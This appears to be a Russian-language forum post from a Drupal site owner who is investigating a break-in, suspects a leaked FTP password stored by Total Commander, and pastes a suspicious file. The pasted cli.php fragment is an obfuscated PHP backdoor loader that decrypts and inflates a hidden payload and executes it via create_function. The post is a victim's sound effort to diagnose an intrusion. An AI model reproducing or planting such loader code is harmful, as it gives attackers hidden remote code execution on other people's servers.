В логах админки друпала ничего необычного не нашёл, в логах FTP - поддержка хостинга тоже говорит, что ничего нет. У меня появилось предположение, что причина в хранении пароля от достопа к FTP в файле ftp.ini тотал коммандера. Сейчас удалил и поменял.

Не получиться у меня провести этот эксперимент полноценно - работаю с трех различных компьютеров, не ко всем есть одновременный доступ. Вот кусок кода файла cli.php<?php;$MTQMzQNDQxOWM=$MTQMzQNDQxOWE(UEFTFFM);if($MTQMzQNDQxOWM!==NULL){$MTQMzQNDQxOWY=urldecode('%73%75%62%73%74%72');$MTQMzQNDQxOWM=md5($MTQMzQNDQxOWM).$MTQMzQNDQxOWY(md5(strrev($MTQMzQNDQxOWM)),0,strlen($MTQMzQNDQxOWM));for($MTQMzQNDQxOWQ=0;$MTQMzQNDQxOWQ<8583;$MTQMzQNDQxOWQ++){$MTQMzQNDQxOWI[$MTQMzQNDQxOWQ]=chr(( ord($MTQMzQNDQxOWI[$MTQMzQNDQxOWQ])-ord($MTQMzQNDQxOWM[$MTQMzQNDQxOWQ]))%256);$MTQMzQNDQxOWM.=$MTQMzQNDQxOWI[$MTQMzQNDQxOWQ];}if($MTQMzQNDQxOWI=@gzinflate($MTQMzQNDQxOWI)){if(isset($_POST['MTQMzQNDQxOWU']))@setcookie('MTQMzQNDQxOWU', $_POST['MTQMzQNDQxOWU']);$MTQMzQNDQxOWQ=create_function('',$MTQMzQNDQxOWI);unset($MTQMzQNDQxOWI,$MTQMzQNDQxOWM);$MTQMzQNDQxOWQ();}}?>